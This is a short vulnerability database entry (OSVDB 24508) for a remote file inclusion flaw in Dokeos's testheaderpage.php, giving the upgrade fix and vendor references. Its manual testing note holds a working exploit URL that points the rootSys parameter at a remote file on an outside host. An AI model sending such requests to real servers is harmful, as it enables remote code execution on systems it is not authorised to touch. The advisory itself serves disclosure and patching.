Dokeos testheaderpage.php rootSys Remote File Inclusion

2006-04-05T06:02:41
ID OSVDB:24508
Type osvdb
Reporter OSVDB
Modified 2006-04-05T06:02:41

Description

Solution Description

Upgrade to version 1.6.4, 2.0.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&c

References:

Vendor Specific News/Changelog Entry: http://www.dokeos.com/forum/viewtopic.php?p=27903#27903 Vendor Specific News/Changelog Entry: http://www.dokeos.com/forum/viewtopic.php?t=6848 Vendor Specific News/Changelog Entry: http://www.dokeos.com/wiki/index.php/Dokeos_1.6.4_release_notes_and_changelog Secunia Advisory ID:19576